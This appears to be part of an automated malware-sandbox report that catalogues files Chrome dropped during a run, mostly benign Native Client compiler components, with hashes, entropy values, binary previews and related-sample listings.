                                                                                                                                                                                                                        Preview: Cr24..............0.."0...*.H.............0...........\7c.<........Fto.8.2'5..qk...%....2...C.F.9.#..e.xQ.......[...L|....3>/....u.:T.7...(.yM...?V.<?........1.a...O?d.....A.H..'.MpB..T.m..Vn Ip..>k.|1..n.<Fb..f..*Q1.....s..2..{*.6....Pp....obM..1.......b1.......(.u^.'z......v.F.W.X4."-*eu...b.........\..F!...b...l5....zJ.q.......L].....w[T0.6....E.....r..%Z.vFm.9..5!,.~g5...;.t...']....+A.....u....k...e..&..l.6r[yU...%..f.......N..V.....<+.....l..}.{...z...)y.n..'..).....,.b....5.08K%..O.g..D.S.F5o..<(....>....\f..X..I..2."l...w....7f|.~.c.4.E.......0..0...*.H............0.......).'..b.*$w\$.q&.]zF_2..;...?.U,...W..L1.2...R..#....W.....c1k.$W..$.J....+M!.Hz.n`U.I)N.|b.l....{.K@]6.LlP/....](.A..................I...).H....IQ.y.;MG.d..ix..#f.Z$|..|.?...0K...t"i..s...Y..%.Ky....0...{.!+.~v.;....J.....Z....).(6..@?v.;~..2..c....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. .0...|!..A..L.+.=...kP.!.1..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\560c3c5f-35c2-4968-b922-58652e03e960.tmp
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):768843
                                                                                                                                                                                                                        Entropy (8bit):7.992932603402907
                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                        SSDEEP:12288:cK2ED9wjXNC1Gse83ru82/u0eKhgxuPFrDXgtbPz54Pm1D0fBmfH1sBrJ9mTiDga:cK2ED9I48seur0/uZKCuPNbgtbz6m1ob
                                                                                                                                                                                                                        MD5:A11D5CAF6BF849AEB84B0C95B1C3B7CF
                                                                                                                                                                                                                        SHA1:27F410CCBD75852C01C7464A1FD7EF8C29BE3916
                                                                                                                                                                                                                        SHA-256:D0E62ACE64AFC334330A7AC3A2CC657914FEB321F1F89AEE11D2A6D0E7D81C31
                                                                                                                                                                                                                        SHA-512:086C124DE3A01BE467647F3BCB4EA05105F690AB45417A0E3D38935ABA9E2381DF59AF98D0FFF7823CEFD5390B48807352E135AC70977AED7B413A8CC48FB590
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: Cr24..............0.."0...*.H.............0...........\7c.<........Fto.8.2'5..qk...%....2...C.F.9.#..e.xQ.......[...L|....3>/....u.:T.7...(.yM...?V.<?........1.a...O?d.....A.H..'.MpB..T.m..Vn Ip..>k.|1..n.<Fb..f..*Q1.....s..2..{*.6....Pp....obM..1.......b1.......(.u^.'z......v.F.W.X4."-*eu...b.........6W..>Nuw9..R{c...Nq.H.K..A!....`v.k+..?.5.>v.....;.._~....tp....x.q.V...7.m.O.~.{!.o/q.'..BK..4./?'.....L..fH&.._<..&.p.k^..\s...:1y..F.N.+...X.PO@Mo....X.G1:..Y.@;..j..........=ae...0.......DU....n...n.;.Ipr..Q....:... <.....a.Y....{ei........0..0...*.H............0.......Mbh=.[O}.+..U.KHF(n3.\"...,g.c...6)..(.E...U...#.i.a..:...N.....P...x.O...(mC;|.5.S.{m.aEx...[..fP.i`.y..5..R....v.$......l-m.............m....ni...`..W.....R.p.b.+...+.\k.R$e~.J\.&c%.d...M..j..V.%...+1F....D....X\.1ct.<........E.B.+.i@...8..^...&YR...I.o...,.....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. D.'.N@.(..GK....m...A.0.."
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\7040_2142074851\_metadata\verified_contents.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):3034
                                                                                                                                                                                                                        Entropy (8bit):5.876664552417901
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:p/hEc9q0S+UTKYM43z8nqMsfWRUWEADM/W9n7lqFkakzcVTGkcYTPi6zM:RGcg5z/jjjHgUnV278+aWLy4
                                                                                                                                                                                                                        MD5:8B6C3E16DFBF5FD1C9AC2267801DB38E
                                                                                                                                                                                                                        SHA1:F5CADC5914DF858C96C189B092BC89C29407BBAA
                                                                                                                                                                                                                        SHA-256:FD986A547D9585E98F451B87CA85DEB4B61EE540C6FAC678D7BEDABF04653095
                                                                                                                                                                                                                        SHA-512:37048EF8FADF62A26CAEC6EE90AC192429AB1E99424E5C68FACA90C0DAD68642C761FDCAC03FC38FA930841F91FA145A6943EC7F168D4F2FA426F1F092C2F502
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: [{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJfcGxhdGZvcm1fc3BlY2lmaWMveDg2XzY0L3BuYWNsX3B1YmxpY19wbmFjbF9qc29uIiwicm9vdF9oYXNoIjoiVkNUSHNJVHNUSXVncWNhV2ctWHVpTU1sdWloV1FSTE1sQnpTTGprdGhETSJ9LHsicGF0aCI6Il9wbGF0Zm9ybV9zcGVjaWZpYy94ODZfNjQvcG5hY2xfcHVibGljX3g4Nl82NF9jcnRiZWdpbl9mb3JfZWhfbyIsInJvb3RfaGFzaCI6ImxINWt2a1BvSVZZczZKVHhyOHc5Q2MxXzloVEJCX3lVSlF6VDZseVVNd0kifSx7InBhdGgiOiJfcGxhdGZvcm1fc3BlY2lmaWMveDg2XzY0L3BuYWNsX3B1YmxpY194ODZfNjRfY3J0YmVnaW5fbyIsInJvb3RfaGFzaCI6IkVuLVFQTW1HUm1xbG9Ud1gzOTAzckpsMkw0R25sQmdET1FhZlNKaHJ4Nk0ifSx7InBhdGgiOiJfcGxhdGZvcm1fc3BlY2lmaWMveDg2XzY0L3BuYWNsX3B1YmxpY194ODZfNjRfY3J0ZW5kX28iLCJyb290X2hhc2giOiJkT2lJVzRmdEdGNW9FY0k1UXYyYjBmdXNrUlYyaUVtdmxhbmV6MlpFc3VvIn0seyJwYXRoIjoiX3BsYXRmb3JtX3NwZWNpZmljL3g4Nl82NC9wbmFjbF9wdWJsaWNfeDg2XzY0X2xkX25leGUiLCJyb290X2hhc2giOiIzNEU5QU9EMmpqLWNoMzZQZ0NVV0YtMUpYWVhVdlNGY1I4bks1aWppcWNjIn0seyJwYXRoIjoiX3B
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\7040_2142074851\_platform_specific\x86_64\pnacl_public_pnacl_json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):507
                                                                                                                                                                                                                        Entropy (8bit):4.68252584617246
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:TjLJ7qaVgPPd8bdzQBXefosmc5T9+n6e1Cetm1JXcAwA:TJ7jViPOd8wfHmZ6RP15
                                                                                                                                                                                                                        MD5:35D5F285F255682477F4C50E93299146
                                                                                                                                                                                                                        SHA1:FB58813C4D785412F05962CD379434669DE79C2B
                                                                                                                                                                                                                        SHA-256:5424C7B084EC4C8BA0A9C69683E5EE88C325BA28564112CC941CD22E392D8433
                                                                                                                                                                                                                        SHA-512:59DF2D5F2684FACC80C72F9C4B7E280F705776076C9D843534F772D5A3D578BEE04289AEE81320F23FB4D743F3969EDF5BA53FEBBAC8A4D27F3BC53BCF271C3E
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {. "COMMENT": [. "This file serves as a template for the resource info description used by ", . "the NaCl Chrome plugin. It is kept in the NaCl repository to prevent ", . "hard-coding of NaCl-specific information inside the Chrome repository.". ], . "abi-version": 1, . "pnacl-arch": "x86-64", . "pnacl-ld-name": "ld.nexe", . "pnacl-llc-name": "pnacl-llc.nexe", . "pnacl-sz-name": "pnacl-sz.nexe", . "pnacl-version": "5dfe030a71ca66e72c5719ef5034c2ed24706c43".}
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\7040_2142074851\_platform_specific\x86_64\pnacl_public_x86_64_crtbegin_for_eh_o
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2712
                                                                                                                                                                                                                        Entropy (8bit):3.4025803725190906
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:b/5D5V5PK82aTS6aTTw0Do1DttoyDNsEA:b/hbVic1ZtLDNsE
                                                                                                                                                                                                                        MD5:604FF8F351A88E7A1DBD7C836378AE86
                                                                                                                                                                                                                        SHA1:9D8D89AE9F13D6306E619A4EAAD51EDE91A5F9F3
                                                                                                                                                                                                                        SHA-256:947E64BE43E821562CE894F1AFCC3D09CD7FF614C107FC94250CD3EA5C943302
                                                                                                                                                                                                                        SHA-512:85B1EDA4C473E00034EE627B7ABB894A77E521BC6A91A91A4A3744CA7511CB0AF10B9723D9ECC2CE3378DD70B659DF842D8C11875958CB77070CF01EC0A15840
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: .ELF..............>.................................@.....@.......................................PH.......,$J.l=....J.$<A[..@.A...M..A..ffffff..................PH......,$J.l=....J.$<A[..D..A...M..A..ffffff..................PH..1..,$J.l=....J.$<A[.......A...M..A..ffffff..................PH..SP..h.........fff...................h.........fff.............J.$<[.,$J.l=....J.$<.....f.....................................................................................................................................................................................NaCl....x86-64...........zR..x......................@....C....C.........8.......@....C....C.........T.......@....C....C.........p.......`....C....C..B...... .......................<...............@.......X.......................t........................clang version 3.7.0 (https://chromium.googlesource.com/a/native_client/pnacl-clang.git ce163fdd0f16b4481e5cf77a16d45e9b4dc8300e) (https://chromium.googlesource.com/a/native_client/pna
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\7040_2142074851\_platform_specific\x86_64\pnacl_public_x86_64_crtbegin_o
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2776
                                                                                                                                                                                                                        Entropy (8bit):3.5335802354066246
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:b/5D5V5ej5ej5PjDdaTS6aTTw6DV1DtFouoyDOsTy:b/hbEEVJB1ZFhLDOsT
                                                                                                                                                                                                                        MD5:88C08CD63DE9EA244F70BFC53BBCADF6
                                                                                                                                                                                                                        SHA1:8F38A113A66B18BAA02E2C995099CF1145A29DAA
                                                                                                                                                                                                                        SHA-256:127F903CC986466AA5A13C17DFDD37AC99762F81A794180339069F48986BC7A3
                                                                                                                                                                                                                        SHA-512:78D2500493A65A23D101EC2420DC5F0CE8C75EFAC425C28547121643E4FB568E9D827EF2C0F7068159E043C86B986F29BF92C6BADC675F160B63C7B3512EB95F
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: .ELF..............>.....................X...........@.....@.......................................PH.......,$J.l=....J.$<A[..@.A...M..A..ffffff..................PH......,$J.l=....J.$<A[..D..A...M..A..ffffff..................PH..1..,$J.l=....J.$<A[.......A...M..A..ffffff..................PH..,$J.l=....J.$<A[f........A...M..A..ffffff..................PH..,$J.l=....J.$<A[f........A...M..A..ffffff..................PH..SP..h.........fff.............J.$<[.,$J.l=....J.$<.....f.K...............`.......P.......................z...................................NaCl....x86-64...clang version 3.7.0 (https://chromium.googlesource.com/a/native_client/pnacl-clang.git ce163fdd0f16b4481e5cf77a16d45e9b4dc8300e) (https://chromium.googlesource.com/a/native_client/pnacl-llvm.git 7251d5b59fca15195c94a3a7da70f0081724448f)............zR..x......................@....C....C.........8.......@....C....C.........T.......@....C....C.........p.......@....C....C.................@....C....C.................@...
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\7040_2142074851\_platform_specific\x86_64\pnacl_public_x86_64_crtend_o
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1520
                                                                                                                                                                                                                        Entropy (8bit):2.799960074375893
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:Bvx/ekjlM/NQQmTfR9yp9396QQmTfR9C6wRqD8MTDDw7lEOkSbfuEAXwX6BX2U8b:bDjO/NbmT3296bmT3Twk8qDwh7b7CD8
                                                                                                                                                                                                                        MD5:75E79F5DB777862140B04CC6861C84A7
                                                                                                                                                                                                                        SHA1:4DB7BDC80206765461AC68CEC03CE28689BBEE0C
                                                                                                                                                                                                                        SHA-256:74E8885B87ED185E6811C23942FD9BD1FBAC9115768849AF95A9DECF6644B2EA
                                                                                                                                                                                                                        SHA-512:FE3F86E926759E71494F2060C4ED3C883EBCAF20CB129A5AD7F142766C33FAB10B5FABC3C7C938E0E895E27EA0AC03CBFE8D0EEABF5300A4AD07F67FD96CC253
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: .ELF..............>.................................@.....@.........................NaCl....x86-64.......clang version 3.7.0 (https://chromium.googlesource.com/a/native_client/pnacl-clang.git ce163fdd0f16b4481e5cf77a16d45e9b4dc8300e) (https://chromium.googlesource.com/a/native_client/pnacl-llvm.git 7251d5b59fca15195c94a3a7da70f0081724448f)...text..comment..bss..group..note.GNU-stack..eh_frame..shstrtab..strtab..symtab..data..note.NaCl.ABI.x86-64.......................................................!................................................................................................................................................................................................../../../pnacl/support/crtend.c.__EH_FRAME_END__...............................................................................................@...............................................................H.......................................P.......................H...............................
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\7040_2142074851\_platform_specific\x86_64\pnacl_public_x86_64_ld_nexe
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=7511538a3a6a0b862c772eace49075ed1bbe2377, stripped
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2163864
                                                                                                                                                                                                                        Entropy (8bit):6.07050487397106
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:HPHonIwYZJ0ykwVO7Owf31yJKzCtxO8RSV4lY+PbeHVxCtjFV4lBNeSAmfGqa+A7:HvSMRwf3SKmlY+PyPvnM2Gq+
                                                                                                                                                                                                                        MD5:0BB967D2E99BE65C05A646BC67734833
                                                                                                                                                                                                                        SHA1:220A41A326F85081A74C4BB7C5F4E115D1B4B960
                                                                                                                                                                                                                        SHA-256:C6C2D0C2FC3E38A9BFA19C78066439C2F745393F1FD1C49C3C6777F697222C76
                                                                                                                                                                                                                        SHA-512:8EF8689E00E4B210A30444D18ED6247F364995ABEB2FD272064C3AF671EEDB4D9B8B67CA56F72FEBF8F56896D4EA7EC4B10CB445FFA1C710C1F312E9DA0E4896
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                                        • Filename: Microsoft Document.htm, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: File.html, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: SecuredMessage.html, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: Microsoft Document.htm, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: Microsoft Document.htm, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: Carl.shepherd-VoiceFax-720-6145-720.html, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: SecuredMessage.html, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: pkeyuibx.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: #Ud83d#Udce8 INV statement.htm, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: message_zdm.html, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: SecuredMessage.html, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: cC6A9znVtH.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: TaylormadegolfFile Received December 03,2021-03_43_52 AM.html, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: Todd.neely-VoiceFax-572-2536-572.html, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: michael.schwab-1VN.htm, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: 4HhMAtU4Ok.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: Payment Confirmation.html, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: AX-426495-pdf.htm, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: 'Vm Note'jgable On Thu, 02 Dec 2021 001533 +0100.html, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: PaymentAdvice_53-44955876.htm, Detection: malicious, Browse
                                                                                                                                                                                                                        Preview: .ELF..............>..... .......@.........!.........@.8...@......................................................................................................................................................{......W...............................................@.......@...............P.td.....h.......h.......h......4b......4b..............Q.td................................................................NaCl....x86-64..............GNU.u.S.:j..,w...u...#w.......?......Y@.......@......1@......B@......P@.....@X@.....``@......h@.....pp@.....H.@.......@.......@.......@.......@.......@....`..@.......@.......A.......A......................p................@..............?.......A.........5.....?5.5...?.5.....?......P9..............PC.......?......0@................aCoc...?..`.(..?.y.P.D.?<.s..O.u......$@.......@...............@........................................ ... ....... .......@...`...`...`...`...................`...`...`...`...`...`...`...................................`...
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\7040_2142074851\_platform_specific\x86_64\pnacl_public_x86_64_libcrt_platform_a
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:current ar archive
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):40552
                                                                                                                                                                                                                        Entropy (8bit):4.127255967843258
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:xlP+1fzyUNVU5LmKxeOnjpD5eA/eUnUUxvT:xlP+1ryYMTekpD5eAWjuvT
                                                                                                                                                                                                                        MD5:0CE951B216FCF76F754C9A845700F042
                                                                                                                                                                                                                        SHA1:6F99A259C0C8DAD5AD29EE983D35B6A0835D8555
                                                                                                                                                                                                                        SHA-256:7A1852EA4BB14A2A623521FA53F41F02F8BA3052046CF1AA0903CFAD0D1E1A7B
                                                                                                                                                                                                                        SHA-512:7C2F9BF90EB1F43C17B4E14A077759FA9DC62A7239890975B2D6FD543B31289DC3B49AE456CA73B98DE9AC372034F340C708D23D9D3AAB05CCBDABDC56A6314E
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: !<arch>./ 0 0 0 0 624 `...................,...8...Z(..e...e...t...t...y`..y`..y`..y`..y`..y`..y`..y`..y`..y`..y`..y`..y`..y`........................fmod.fmodf.memcmp.memcpy.memmove.memset.__nacl_read_tp.__pnacl_init_irt.longjmp.setjmp.__Sz_fptosi_f32_i64.__Sz_fptosi_f64_i64.__Sz_fptoui_f32_i32.__Sz_fptoui_f32_i64.__Sz_fptoui_f64_i32.__Sz_fptoui_f64_i64.__Sz_sitofp_i64_f32.__Sz_sitofp_i64_f64.__Sz_uitofp_i32_f32.__Sz_uitofp_i32_f64.__Sz_uitofp_i64_f32.__Sz_uitofp_i64_f64.nacl_tp_tdb_offset.nacl_tp_tls_offset.__Sz_bitcast_16xi1_i16.__Sz_bitcast_8xi1_i8.__Sz_bitcast_i16_16xi1.__Sz_bitcast_i8_8xi1.__Sz_fptoui_4xi32_f32.__Sz_uitofp_4xi32_4xf32..e_fmod.o/ 0 0 0 644 2792 `..ELF..............>.....................(...........@.....@.......................................PH..AVAUATSfI.~.M..I.. E....@.A......D..D1.......8fI.~.M.....I.. E..A......D..D..t.D....D..f....D..=....r...Y...^.[A\A]A^..@..,$J.l=....J.$<A[A...M..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\7040_2142074851\_platform_specific\x86_64\pnacl_public_x86_64_libgcc_a
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:current ar archive
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):132784
                                                                                                                                                                                                                        Entropy (8bit):3.6998481247844937
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:Hf0mOXYmeKzQUIdedRFvT5p1Ee2HyAlL3O4:Hf7OXdmWRJT5p1R2HyAhO4
                                                                                                                                                                                                                        MD5:C37CA2EB468E6F05A4E37DF6E6020D0F
                                                                                                                                                                                                                        SHA1:EA787E5EADFB488632EC60D8B80B555796FA9FE9
                                                                                                                                                                                                                        SHA-256:C1483ED423FEE15D86E8B5D698B2CDAB89186CE7FF9C4E3D5F3F961FD80D7C6E
                                                                                                                                                                                                                        SHA-512:01281DE92B281FB29E1ACA96AA64B740B65CC3A9097307827F0D8DB9E1C164C56AFCDFA0BF138EA670A596D55CE2C8D722760744E9FC9343BB6514417BF333BA
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: !<arch>./ 0 0 0 0 942 `....;...|.......4...x..#...-...4l..E...M...U...]...n...u...~X...4.......................L......................t...p...............`......"...*...1...:...D...K...T...\...d...r|..|0.......x...........L.......\...8..........................__clzti2.__compilerrt_fmax.__compilerrt_fmaxf.__compilerrt_logb.__compilerrt_logbf.__ctzti2.__divdc3.__divdi3.__divmoddi4.__divmodsi4.__divsc3.__divsi3.__divti3.__fixdfdi.__fixdfsi.__fixdfti.__fixsfdi.__fixsfsi.__fixsfti.__fixunsdfdi.__fixunsdfsi.__fixunsdfti.__fixunssfdi.__fixunssfsi.__fixunssfti.__floatdidf.__floatdisf.__floatsidf.__floatsisf.__floattidf.__floattisf.__floatundidf.__floatundisf.__floatunsidf.__floatunsisf.__floatuntidf.__floatuntisf.compilerrt_abort_impl.__moddi3.__modsi3.__modti3.__muldc3.__muloti4.__mulsc3.__multi3.__popcountdi2.__popcountsi2.__popcountti2.__powidf2.__powisf2.__udivdi3.__udivmoddi4.__udivmodsi4.__udivmodti4.__udivsi3.__udivti3.__umoddi3.__umodsi3.
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\7040_2142074851\_platform_specific\x86_64\pnacl_public_x86_64_libpnacl_irt_shim_a
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:current ar archive
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):13514
                                                                                                                                                                                                                        Entropy (8bit):3.8217211433441904
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:uU9v4pXizdrEuxwk3vp20tprpdSGFwDqO:P9v4palvvc0tpFdSGFwmO
                                                                                                                                                                                                                        MD5:4E8BEDA73EB7BD99528BF62B7835A3FA
                                                                                                                                                                                                                        SHA1:DC0F263A7B2A649D11FF7B56FE9CFAC44F946036
                                                                                                                                                                                                                        SHA-256:6B835FD48DF505EB336FF6518CE7B93BB0ED854DADAA5C1EEED48D420291F62C
                                                                                                                                                                                                                        SHA-512:46116B8BABC719676D68FD40D2AC82F38A3D13D8A482ADFC6FC32A99170AC3420E52CC33242CCD0FA723ABF4FA5EDBB9CE16A09C729BF04AE4AFBB2F67A1E38B
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: !<arch>./ 0 0 0 0 94 `................._pnacl_wrapper_start.__pnacl_real_irt_query_func.__pnacl_wrap_irt_query_func..shim_entry.o/ 0 0 0 644 7392 `..ELF..............>..................... ...........@.....@.........................NaCl....x86-64..................................A.L....A.L...D...........D....A.....t+.. u..t"..A.D..........A... .....A.D...........f..D..<.......................Q.......................V.......................clang version 3.7.0 (https://chromium.googlesource.com/a/native_client/pnacl-clang.git ce163fdd0f16b4481e5cf77a16d45e9b4dc8300e) (https://chromium.googlesource.com/a/native_client/pnacl-llvm.git 7251d5b59fca15195c94a3a7da70f0081724448f).../../ppapi/native_client/src/untrusted/pnacl_irt_shim/shim_entry.c./mnt/data/b/build/slave/sdk/build/src/out_pnacl/x64.NACL_STARTUP_FINI.NACL_STARTUP_ENVC.NACL_STARTUP_ARGC.NACL_STARTUP_ARGV.NaClStartupInfoIndex.unsigned int.size_t.char.TYPE_na
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\7040_2142074851\_platform_specific\x86_64\pnacl_public_x86_64_libpnacl_irt_shim_dummy_a
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:current ar archive
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2078
                                                                                                                                                                                                                        Entropy (8bit):3.21751839673526
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:MOcpdhWE5O/bZbmT3296bmT3TwQwDnvD/+R3:MHuECdaTS6aTTwXDvD/+l
                                                                                                                                                                                                                        MD5:F950F89D06C45E63CE9862BE59E937C9
                                                                                                                                                                                                                        SHA1:9CFAD34139CC428CE0C07A869C15B71A9632365D
                                                                                                                                                                                                                        SHA-256:945B1C8A1666CBF05E8B8941B70D9D044BAAFB59B006F728F8995072DE7C4C40
                                                                                                                                                                                                                        SHA-512:F9AFBB800A875EDCC63DEA4986179E73632B3182951A99C8B3D37DB454EFD7CC7192ECA5AC87514918A858BAD6DAEAB59548CA2E90EADA9900EF5B9F08E62CFC
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: !<arch>./ 0 0 0 0 30 `........._pnacl_wrapper_start..// 20 `.dummy_shim_entry.o/./0 0 0 0 644 1840 `..ELF..............>.................................@.....@.......................................PH..,$J.l=....J.$<.....f..D......................................NaCl....x86-64...clang version 3.7.0 (https://chromium.googlesource.com/a/native_client/pnacl-clang.git ce163fdd0f16b4481e5cf77a16d45e9b4dc8300e) (https://chromium.googlesource.com/a/native_client/pnacl-llvm.git 7251d5b59fca15195c94a3a7da70f0081724448f)............zR..x...................... ....C....C..... .........................rela.text..comment..bss..group..note.GNU-stack..rela.eh_frame..shstrtab..strtab..symtab..data..note.NaCl.ABI.x86-64.....................................................................................................................................................
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\7040_2142074851\_platform_specific\x86_64\pnacl_public_x86_64_pnacl_llc_nexe
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=309d6d3d463e6b1b0690f39eb226b1e4c469b2ce, stripped
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):14091416
                                                                                                                                                                                                                        Entropy (8bit):5.928868737447095
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:196608:tKVqXp3Qev4dg6ilfHM8KLM2J3jqjnkZ:uqufB
                                                                                                                                                                                                                        MD5:9B159191C29E766EBBF799FA951C581B
                                                                                                                                                                                                                        SHA1:D1D4BBC63AB5FC1E4A54EB7B82095A6F2CE535EE
                                                                                                                                                                                                                        SHA-256:2F4A3A0730142C5EE4FA2C05D27A5DEFC18886A382D45F5DB254B61B28ED642B
                                                                                                                                                                                                                        SHA-512:0B4FF60B5428F81B8B1BCF3328CF80CBD88D8CE5E8BDBC236B06D5A54E7CF26168A3ABB348D87423DA613AB3F0B4D9B37CB5180804839F1CA158EC2B315DDF00
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: .ELF..............>..... .......@...................@.8...@...............$.....................................................................................................................!.......!......'......G...............................................@.......@...............P.td............................D.......D...............Q.td................................................................NaCl....x86-64..............GNU.0.m=F>k....&...i........................0C......0C..0C..0E..............0C......0E.-DT.!.?.-DT.!.........................?........-DT.!...-DT.!.?.......?......................?..............?."..."..."..."......@.......`...................... ...@...`...................... ...@...`...................... ...@...`...................... ...@...`.......................................`... ...@...`...........`...`.......@...@....... ....1..`3.. 4..`-..`-...:...:...F..@H..`H...H...F...F...G...H.. H...F..@G...I.. I..@I..@G...G...I...I...J...G..`I..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\7040_2142074851\_platform_specific\x86_64\pnacl_public_x86_64_pnacl_sz_nexe
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
